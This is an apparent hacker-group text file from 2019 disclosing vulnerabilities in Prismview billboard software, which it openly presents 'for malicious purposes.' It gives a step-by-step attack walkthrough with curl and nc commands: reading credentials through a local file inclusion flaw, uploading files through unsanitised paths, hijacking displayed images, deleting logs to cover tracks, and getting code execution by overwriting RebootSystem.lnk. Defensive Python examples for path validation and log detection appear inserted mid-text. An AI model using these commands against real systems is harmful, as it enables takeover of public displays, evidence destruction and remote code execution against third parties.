[09-08-2019]
KEK KOMMUNIKATIONS BRINGS YOU...
█████ ████ █████
░░███ ███░ ░░███
░███ ███ ██████ ░███ █████ █████ ██████ ██████
░███████ ███░░███ ░███░░███ ███░░ ███░░███ ███░░███
░███░░███ ░███████ ░██████░ ░░█████ ░███████ ░███ ░░░
░███ ░░███ ░███░░░ ░███░░███ ░░░░███░███░░░ ░███ ███
█████ ░░████░░██████ ████ █████ ██████ ░░██████ ░░██████
░░░░░ ░░░░ ░░░░░░ ░░░░ ░░░░░ ░░░░░░ ░░░░░░ ░░░░░░
INNOVATORS IN KEK─BASED TEKNOLOGY
EXPERTS IN RESPONSIBLE DISCLOSURE
GENERAL ALL-AROUND COOL D00DZ
╔═══════════════╗
║ prismview.txt ║
╒═─═─═─═─═─═─═─═─═╩─═─═─═─═─═─═─═─╩═─═─═─═─═─═─═─═─═╕
┃ This file is presented for malicious purposes ┃
┃ only. Keksec takes no responsibility for ┃
┃ the use of the information in this file by ┃
┃ shit-eating whitehats, or for the patching of ┃
┃ any vulnerabilities disclosed in this file by ┃
┃ butthurt SWEs. ┃
╘═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═─═╛
Hello?...
Are we still live?...
Ah, there you are! Our faithful friend! Our fantastic follower! We're
very sorry for being gone for so long. Sadly, as with all things, we
have waxed and waned in and out of existence. Heat has come and gone.
Boxes, shells, and exploits too have seen the light of day only to be
snuffed out by zealous whitehats. Somehow, despite the religious fervor
of the whitehat, our billboard vulns haven't been killed. You shitters
really dropped the ball. No, YESCO, telling customers to move boards
behind a VPN is *not* a patch. In this file we're dropping the deetz on
YESCO's (and now Samsung's) Prismview billboard software.
Public Disclosure Timeline:
Found: maliciously
Contacted vendor: technically
Disclosed publicly: affirmatively
[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]
It should first be said that Prismview is a piece of software as well
as a company. The company was owned by YESCO, under which it developed
the initial Prismview software and was then sold to Samsung. The
Prismview software is simply a C# HTTP server which runs on an embedded
Windows installation. It handles scheduling for different images as
well as diagnostics. These Windows installations also come standard
with VNC, AV (usually McAfee or Kaspersky), and other basic software.
Since developing that software Prismview was sold to Samsung and it
would seem that they've transitioned to a model similar to Lamar's.
We would like to take this time to remind Samsung, again, that shoving
your shit behind a VPN does not make it secure.
[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]
In order to control a Prismview billboard, a client program is provided
which implements calls to an HTTP API on the YESCO Prismview server
(referred to as Prismview from now on). All of these operations occur
within the Prismview install directory (%USERPROFILE%\Prismview Player),
and all directories mentioned from now on are within that directory
unless specified otherwise. Here we will go over some endpoints of
interest:
/AMILOGGEDIN
Responds with "OK" if the current IP is logged in or authentication is
disabled. We would tell you which endpoints require authentication but,
as seems to be the Prismview way, this varies between releases.
/PRISMVIEWLOGIN001
Takes two headers, "User" and "Password", and checks if they are equal
to the value configured. If so, it adds the requesting IP to a list of
logged in users. Returns "OK Password" on success or
"OK Password - Not Applicable" if the password was correct but
authentication is disabled.
/PREPAREFORSPLITFILE
Clears the Joiner\ directory. Responds with "OK" on success.
/SPLITUPLOAD
Takes a multipart octet stream and saves it to the file name specified
by the multipart within the Joiner\ directory. Responds
"File Uploaded." on success.
/SPLITJOIN
Reads the file at Joiner\SplitterInfo.xml with the format
<FileSplitterJoinerInfoPacket>
<OutputPathAndNameUnicoded>../path :^)</OutputPathAndNameUnicoded>
<NumberOfFiles>1337</NumberOfFiles>
<LastWriteTime>2011-11-11T11:11:11</LastWriteTime>
</FileSplitterJoinerInfoPacket>
If NumberOfFiles is 3, for example, it will concatenate XferFile.0,
XferFile.1, and XferFile.2. It will then write the result of this
concatenation to OutputPathAndNameUnicoded within the XFER directory.
Doesn't sanitize OutputPathAndNameUnicoded. Responds "OK" on success.
/REBOOTSYSTEM
Runs the RebootSystem.lnk file in the Prismview directory.
/RESTARTPLAYER
Runs the RestartPlayer.lnk file in the Prismview directory.
/RESTARTVNC
Kills all processes with the name "WinVNC" and tries to run the
following programs in order with the single argument "-run":
C:\Program Files\UltraVNC\WinVNC.exe
TightVNC-unstable\WinVNC.exe
TightVNC\WinVNC.exe
VNC\WinVNC.exe
/UPLOAD
Takes a multipart octet stream and the file name, creation year, month,
day, hour, minute, second, and another option which is simply left as
"NA" as comma separated values in HTTP header "prismxfer001". An
example is given in the next section.
/UPLOAD2
Takes a multipart octet stream and the following HTTP headers:
PrismXfer-DestName (base64 encoded upload path)
PrismXfer-FileLength
PrismXfer-FileLastWriteTimeUTC
PrismXfer-MD5Checksum
Writes the file to XFER\. Doesn't sanitize DestName.
/VIEWSCREEN.JPG and/or /VIEWSCREENALL.JPG
Returns a JPEG screen capture of the running server.
/PV9COMMAND
Only has to start with /PV9COMMAND. The request path is then split by
the character '|' and continues only if the resulting array is larger
than 1. The first entry in this resulting array is used as the command,
and the rest are arguments. For example, given that you requested the
path "/PV9COMMAND|INSTANTPLAY1|image.jpg|99", it would run the
INSTANTPLAY1 command with arguments "image.jpg" and "99". Some commands
offered are as follows:
INSTANTPLAY1|{PATH}|{REPEATS}
Plays the image at OperatingMedia/{PATH} REPEATS times on whatever is
attached to the Prismview server. Doesn't sanitize PATH.
INSTANTPLAY2|{PATH}|{REPEATS}
The same as INSTANTPLAY1 except if there is a file at XFER/Media it
will copy that file into OperatingMedia prior to playing it.
DELETEFILE1|{PATH}
Deletes the file at XFER\{PATH}. Doesn't sanitize PATH.
CREATEFOLDER|{PATH}
Creates a directory at XFER\{PATH}. Again, doesn't sanitize PATH.
/../PrismviewV9-Player-006.xml
O-oh.
If the Prismview server can't find an endpoint to handle a request with,
it searches in OperatingMedia/ for the file requested. It doesn't check
for LFI and is very stupid. That XML file contains the username and
password required to authenticate with the Prismview server.
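Every one of the "doesn't sanitize" notes above is the same bug: a client-supplied name is glued onto a target directory (XFER\, OperatingMedia\) and used as-is, so ".." segments walk out of it. The block below is an added example in Python, not Prismview's C# code and not part of this file; it shows that bare concatenation next to the containment check the server should have made. The install path, the UTF-8 decoding of PrismXfer-DestName and the hypothetical function names are assumptions.

```python
import base64
import ntpath
from typing import Optional

# Constructed install location; the advisory gives %USERPROFILE%\Prismview Player.
INSTALL_DIR = r"C:\Users\player\Prismview Player"
XFER_DIR = ntpath.join(INSTALL_DIR, "XFER")


def vulnerable_join(base: str, requested: str) -> str:
    """The behaviour the advisory describes: the client-supplied name is joined
    onto the target directory and the result is used as-is, so '..' segments
    escape it. Kept only to contrast with safe_join."""
    return ntpath.normpath(ntpath.join(base, requested))


def safe_join(base: str, requested: str) -> Optional[str]:
    """Hardened form: normalise first, then require the result to stay inside
    base. Returns None for anything that would escape: absolute or rooted
    paths, drive letters, NUL bytes, '..' hops, and the sibling-prefix case
    (XFER2 starts with XFER but is not inside it)."""
    if not requested or "\x00" in requested:
        return None
    if requested[0] in "\\/" or ntpath.splitdrive(requested)[0]:
        return None
    base_norm = ntpath.normpath(base)
    candidate = ntpath.normpath(ntpath.join(base_norm, requested))
    if ntpath.normcase(candidate) == ntpath.normcase(base_norm):
        return None  # the directory itself is not a valid file target
    try:
        common = ntpath.commonpath([base_norm, candidate])
    except ValueError:  # different drives: cannot be inside base
        return None
    if ntpath.normcase(common) != ntpath.normcase(base_norm):
        return None
    return candidate


def resolve_destname(header_value: str) -> Optional[str]:
    """Validate a PrismXfer-DestName header (base64 of the upload path per the
    advisory; UTF-8 is an assumption) the way /UPLOAD2 should have."""
    try:
        requested = base64.b64decode(header_value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return safe_join(XFER_DIR, requested)


if __name__ == "__main__":
    for name in ("image.jpg", r"Media\logo.jpg", "../path", r"..\XFER2\x"):
        print(repr(name), "->", vulnerable_join(XFER_DIR, name), "|", safe_join(XFER_DIR, name))
```

The comparison is done on the normalised, case-folded result rather than with a startswith() on the raw string: a prefix test passes "..\XFER2\x" and mixed "/" and "\" separators, and it must run after percent-decoding of the request path, since the fallback OperatingMedia\ lookup sees the URL, not a file name.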
It should also be remembered that the Prismview team was immensely
disorganized in creating the Prismview software. Depending on the
version, any number of these endpoints will actually exist. Thankfully,
the Prismview executable is usually at the same place across versions.
You can simply use the LFI to download the executable and open it in
your favorite C# decompiler. The most obviously broken code is in
UserControlWebServer class or one named similarly.
There are far more endpoints of course, but we feel this will give you
at least some idea as to the workings of Prismview.
[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]
Now we will work you through how a master hacker like yourself might go
about finding and exploiting these billboards.
Prismview uses the WeOnlyDo C# webserver API, so some early versions
use that as their HTTP Server header. Later versions simply use some
variation of "Prismview Player". Shodan searches will bring back a few
but not many. More can be found with more comprehensive scans of
business or 4G IP ranges.
You can then find out if authentication is enabled or not by requesting
/AMILOGGEDIN.
# If authentication is disabled you will see something like this
$ curl http://LAME/AMILOGGEDIN
OK
# If it is enabled, you will see this
$ curl http://LAME/AMILOGGEDIN
Failed
If you see "Failed", don't worry. We can simply use our handy dandy LFI
to obtain the Username and Password properties of the configuration
file.
# Note that the name of this file and possibly its location vary per
# release. We leave figuring this out as an exercise for the reader :^)
$ echo -e 'GET /../PrismviewV9-Player-006.xml HTTP/1.0\r\n' \
| nc LAME 80
...
<UserName>bkrebs</UserName>
<Password>god</Password>
...
You can then authenticate with the server
$ curl -H'User: bkrebs' -H'Password: god' http://LAME/PRISMVIEWLOGIN001
OK Password
And use one of the many methods available to upload your image
$ mv image.jpg XferFile.0
$ curl -F file=@XferFile.0 http://LAME/SPLITUPLOAD
File uploaded.
$ echo 'PEZpbGVTcGxpdHRlckpvaW5lckluZm9QYWNrZXQ+CiAgPE91dHB1dFBhdGhB'\
'bmROYW1lVW5pY29kZWQ+Li4vcGF0aCA6Xik8L091dHB1dFBhdGhBbmROYW1l'\
'VW5pY29kZWQ+CiAgPE51bWJlck9mRmlsZXM+MTMzNzwvTnVtYmVyT2ZGaWxl'\
'cz4KICA8TGFzdFdyaXRlVGltZT4yMDExLTExLTExVDExOjExOjExPC9MYXN0'\
'V3JpdGVUaW1lPgo8L0ZpbGVTcGxpdHRlckpvaW5lckluZm9QYWNrZXQ+Cgo='\
| base64 --decode > SplitterInfo.xml
$ curl -F file=@SplitterInfo.xml http://LAME/SPLITUPLOAD
File uploaded.
$ curl http://LAME/SPLITJOIN
OK
or
$ curl -F file=@image.jpg -H'prismxfer001: 2011,11,11,11,11,11,NA' \
http://LAME/UPLOAD
or
$ curl -F file=@image.jpg \
-H'PrismXfer-DestName: SEFLS0EgSEFLS0EgSEFLS0E=' \
-H'PrismXfer-FileLength: 632094' \
-H'PrismXfer-FileLastWriteTimeUTC: 2015-03-03-T00:00:00' \
-H'PrismXfer-MD5Checksum: 07094d279ef4502e07477fa58631113b' \
http://LAME/UPLOAD2
etc.
Depending on where you uploaded your image to there are several ways to
play it. The laziest would be to refresh the home page and wait until
an image is playing with the same file extension as the one you wish to
put up. Then you can simply upload your image over that file and it
will play the next time the schedule loops around. If you can't find an
image with the same extension, just upload the image file to
OperatingMedia\ and play it using INSTANTPLAY1.
$ curl 'http://LAME/PV9COMMAND|INSTANTPLAY1'\
'|image.jpg'\
'|999999'
OK
If you're lazy you're done here. If not, you probably want to at least
unlink the logs.
$ curl 'http://LAME/GETLISTLOGDIRECTORY'
...
SystemLog-06-08-37.lg 344 6/8/1337 12:00 AM
SystemLog-06-08-37.lg 344 6/9/1337 12:00 AM
SystemLog-06-08-37.lg 344 6/10/1337 12:00 AM
SystemLog-06-08-37.lg 344 6/11/1337 12:00 AM
...
$ curl 'http://LAME/PV9COMMAND|DELETEFILE1|Log\SystemLog-06-08-37.lg'
OK
Getting code execution is fairly easy as well. Just upload a file to
overwrite RebootSystem.lnk in the Prismview directory or any of the
WinVNC.exes and then request /REBOOTSYSTEM or /RESTARTVNC to execute
it.
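Since the player's own Log\ directory can be emptied through DELETEFILE1, the record worth keeping is one the billboard cannot reach: a reverse proxy or tap log stored elsewhere. The block below is an added example in Python, not part of this file and not Prismview's code; it tags requests by the endpoints documented above and raises alerts for the upload-then-/REBOOTSYSTEM chain, log deletion and path traversal. The log lines, the Combined Log Format, the 10.20.0.x "trusted operator" prefix and the 15-minute window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample lines (not real traffic) in Combined Log Format, the
# shape a reverse proxy or tap in front of the player would record.
SAMPLE_LOG = r"""
203.0.113.7 - - [09/Aug/2019:10:00:01 +0000] "GET /AMILOGGEDIN HTTP/1.1" 200 6 "-" "curl/7.58.0"
203.0.113.7 - - [09/Aug/2019:10:00:05 +0000] "GET /../PrismviewV9-Player-006.xml HTTP/1.0" 200 2048 "-" "-"
203.0.113.7 - - [09/Aug/2019:10:00:09 +0000] "GET /PRISMVIEWLOGIN001 HTTP/1.1" 200 11 "-" "curl/7.58.0"
203.0.113.7 - - [09/Aug/2019:10:01:30 +0000] "POST /UPLOAD2 HTTP/1.1" 200 14 "-" "curl/7.58.0"
203.0.113.7 - - [09/Aug/2019:10:02:10 +0000] "GET /PV9COMMAND|DELETEFILE1|Log\SystemLog-06-08-37.lg HTTP/1.1" 200 2 "-" "curl/7.58.0"
203.0.113.7 - - [09/Aug/2019:10:02:40 +0000] "GET /REBOOTSYSTEM HTTP/1.1" 200 2 "-" "curl/7.58.0"
10.20.0.4 - - [09/Aug/2019:10:05:00 +0000] "GET /VIEWSCREEN.JPG HTTP/1.1" 200 51234 "-" "PrismviewClient"
10.20.0.4 - - [09/Aug/2019:10:05:02 +0000] "GET /PV9COMMAND|INSTANTPLAY1|promo.jpg|3 HTTP/1.1" 200 2 "-" "PrismviewClient"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)

# Constructed assumption: the operator reaches the player only from this prefix.
TRUSTED_PREFIXES = ("10.20.0.",)
CONTROL_ENDPOINTS = {"/REBOOTSYSTEM", "/RESTARTVNC", "/RESTARTPLAYER"}
WRITE_ENDPOINTS = {"/PREPAREFORSPLITFILE", "/SPLITUPLOAD", "/SPLITJOIN", "/UPLOAD", "/UPLOAD2"}
TRAVERSAL_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")
EXECUTE_WINDOW = timedelta(minutes=15)


def classify(path: str, ip: str) -> list:
    """Tag one request path with the Prismview behaviours it touches."""
    decoded = unquote(path).split("?", 1)[0]  # undo %2e%2e / %7c style encoding
    upper = decoded.upper()
    tags = []
    if TRAVERSAL_RE.search(decoded):
        tags.append("path_traversal")
    if upper.startswith("/PV9COMMAND"):
        parts = upper.split("|")
        if (len(parts) > 2 and parts[1] == "DELETEFILE1"
                and parts[2].lstrip("\\/").startswith(("LOG\\", "LOG/"))):
            tags.append("log_tampering")
        elif len(parts) > 1:
            tags.append("pv9_command")
    if upper in CONTROL_ENDPOINTS:
        tags.append("control_endpoint")
    if upper in WRITE_ENDPOINTS:
        tags.append("file_write")
    if upper in ("/AMILOGGEDIN", "/PRISMVIEWLOGIN001") and not ip.startswith(TRUSTED_PREFIXES):
        tags.append("auth_from_untrusted")
    if upper.startswith("/VIEWSCREEN"):
        tags.append("screen_capture")
    return tags


def analyze(log_text: str) -> dict:
    """Return tagged events plus per-IP alerts, including the chain of a file
    write followed within EXECUTE_WINDOW by a control endpoint."""
    events, last_write, alerts = [], {}, set()
    for line in log_text.strip().splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, path = m["ip"], m["path"]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        tags = classify(path, ip)
        if tags:
            events.append({"ip": ip, "ts": ts, "path": path, "tags": tags})
        if "file_write" in tags:
            last_write[ip] = ts
        if "control_endpoint" in tags and ip in last_write and ts - last_write[ip] <= EXECUTE_WINDOW:
            alerts.add((ip, "upload_then_execute"))
        for kind in ("log_tampering", "path_traversal"):
            if kind in tags:
                alerts.add((ip, kind))
    return {"events": events, "alerts": sorted(alerts)}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for e in result["events"]:
        print(e["ip"], e["path"], ",".join(e["tags"]))
    for ip, kind in result["alerts"]:
        print("ALERT", ip, kind)
```

The operator's own INSTANTPLAY1 and /VIEWSCREEN.JPG requests are tagged but not alerted on, so the noise stays low; matching is done on the percent-decoded, upper-cased path because the server only needs the request to start with /PV9COMMAND and the '|' separator may arrive raw or encoded.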
[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]
In conclusion, fuck YESCO, fuck Samsung, and fuck Prismview.
GLHF
<3 keksec
[@le_keksec]
[le_keksec@protonmail.com]
[KeKSeC]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[KeKSeC]
greets to thugcrowd and conflict ;-*